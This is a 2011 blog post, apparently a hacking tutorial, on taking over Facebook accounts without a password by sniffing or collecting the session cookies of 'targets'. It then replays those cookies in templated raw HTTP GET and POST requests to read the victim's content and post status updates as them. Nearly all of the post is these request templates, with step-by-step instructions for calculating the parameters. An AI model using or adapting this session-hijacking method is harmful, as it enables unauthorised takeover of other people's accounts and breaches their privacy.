Powered By Blogger

Sunday, July 24, 2011

Controlling facebook accounts [No Pasword][Non-Script Kiddie Tut]

Login to your Facebook account and sniff your cookie OR collect a few live Facebook Biscuit/s of your Target/s.

1 ] Generate a OG 10 Digit Unix Timestamp. If possible not way back older than FaceBook.COM's current SYSTIME.


2 ] Send a GET Request to www.facebook.com port 80 after calculating the required variables (below)

GET /home.php? HTTP/1.1
Cookie: datr=(10-DIGIT-CURRENT-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; cvr_tx=(OG-TIME-STAMP+63-TOTAL-SHOULD-BE-10-DIGIT-NEWTIMESTAMP)859; login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); made_write_conn=(OG-TIME-STAMP+64-10-DIGIT-NEW-STAMP); cur_max_lag=3; h_user=(12-HEX-STRING-FOREVER-FIXED-FOR-YOUR-ID); locale=en_US



3 ] From the Response Obtained :
Gain the variable nctr[nid]. For now keep nctr[id] same as nctr[nid].

Calculating the new nctr[ct] :
Add +79 to Original Timestamp. Append 3 more digits to its end.

Calculating &oldest= :
Deduct 144556 from Original Timestamp.

Calculating composer_id :
Search for
UIComposer_STATE_PIC_OUTSIDE\" id=\"
This will be your composer_id at the later stage in the Status Update Page / Other Post Request

Calculating post_form_id
Search for
post_form_id:"
This will be your post_form_id at the later stage in the Status Update Page / Other Post Request

Calculating fb_dtsg
Right after post_form_id (explained just above this section) you can locate fb_dtsg.
Else Search for
,fb_dtsg:"
This will be your fb_dtsg at the later stage in the Status Update Page / Other Post Request

Your login_x actually looks like
a:2:{s:5:"email";s:13:"you@youremailprovider.com";s:19:"remember_me_default";b:0;}
But keep it unchanged in the hex format.


4 ] Send a GET Request like below with the above calculated variables :

GET /ajax/intent.php?hidden_count=5&oldest=(10-DIGIT-NEWLY-CALCULATED)&delay_load_count=15&request_type=none&nctr[id]=(32-HEX-STRING-OBTAINED-FROM-home.php-)&nctr[nid]=(32-HEX-STRING-OBTAINED-FROM-home.php-)&nctr[ct]=(NEWLY-CALCULATED-10-DIGIT-TIMESTAMP)750 HTTP/1.1
Accept: */*
Accept-Language: en-US
XXXXXXX: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
x-svn-rev: 161013
UA-CPU: x86
XXXXXXXXXXXXXXX: XXXXXXXXXXXXX
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: www.facebook.com
Connection: Keep-Alive
Cookie: datr=(10-DIGIT-CURRENt-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); made_write_conn=(OG-TIME-STAMP+64-10-DIGIT-NEW-STAMP); cur_max_lag=3; h_user=(12-HEX-STRING-FOREVER-FIXED-FOR-YOUR-ID); locale=en_US; x-referer=http%3A%2F%2Fwww.facebook.com%2Fhome.php



5 ] In the output :
Search for Env[\"nctrlid\"]=\"
This is the NEW TRUE nctr[id]= for the Status Update POST Request :-)


6 ] Generate a new POST Request with the above calculated new variables :

POST /updatestatus.php HTTP/1.1
Accept: */*
Accept-Language: en-US
XXXXXXX: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
x-svn-rev: 161013
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
XXXXXXXXXXXXXXX: XXXXXXXXXXXXX
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: www.facebook.com
Content-Length: 343
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: datr=(10-DIGIT-CURRENt-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); cur_max_lag=3; h_user=(12-HEX-STRING-FOREVER-FIXED-FOR-YOUR-ID); locale=en_US; x-referer=http%3A%2F%2Fwww.facebook.com%2Fhome.php

action=HOME_UPDATE&home_tab_id=1&profile_id=(YOUR-10-DIGIT-PROFILE-ID)&status=TYPE-THE-STATUS-HERE&target_id=0&&composer_id=(24-HEX-STRING-OBTAINED-FROM-home.php-RESPONSE))&post_form_id=(32-HEX-STRING-FROM-home.php-RESPONSE)&fb_dtsg=(27-HEX-STRING-)-FROM-home.php-RESPONSE&post_form_id_source=AsyncRequest&nctr[id]=(32-HEX-STRING-CALCULATED-AS-EXPLAINED-IN-POINT-5)&nctr[nid]=(32-HEX-STRING-OBTAINED-FROM-home.php-RESPONSE)&nctr[ct]=(10-DIGIT-CALCULATED-TIMESTAMP-AS-EXPLAINED-In-POINT-3)375




7 ] Use the above variables to view any content with the appropriate GET / requests


8 ] For POST-ing making changes, GOTO 2 ] and REDO :-)
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)